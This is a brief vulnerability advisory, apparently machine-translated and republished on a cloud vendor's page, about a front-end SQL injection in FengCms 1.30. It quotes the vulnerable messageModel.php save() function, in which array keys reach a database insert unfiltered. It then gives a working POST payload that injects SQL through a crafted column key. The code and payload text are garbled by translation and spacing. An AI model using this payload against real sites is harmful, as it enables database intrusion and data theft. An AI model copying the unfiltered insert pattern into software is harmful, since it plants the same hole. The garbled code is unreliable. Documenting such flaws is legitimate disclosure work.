FengCms1.30 injection (front-end)

Source: Internet
Author: User

FengCms1.30 injection (front-end)

Http://www.fengcms.com/

App \ model \ messageModel. php

public function save($array){if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}unset($array['vcode']);$re=D($this->d_name)->insert($array);if($re){$_SESSION['authnum']="";return array('status' => 'y','id' => $re);}else{return array('status' => 'n','id' => $re);}

$ Re = D ($ this-> d_name)-> insert ($ array );

The array key is not filtered.

Escape is ignored in reverse quotation marks.

Pyload:

POST /? Controller = message & operate = save

Title ', 'name', 'qq', 'tel', 'mail', 'content', 'time') values (user (), qq, qq, qq, 1426038685 ); # insert/**/into/**/'f _ message'/**/('title = testsql & name = & qq = & tel = & mail = & content = aaaaaaaaaaaa & vcode = vzyd & time = 1426039319

 




 




 

 

Solution:

Filter ~

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.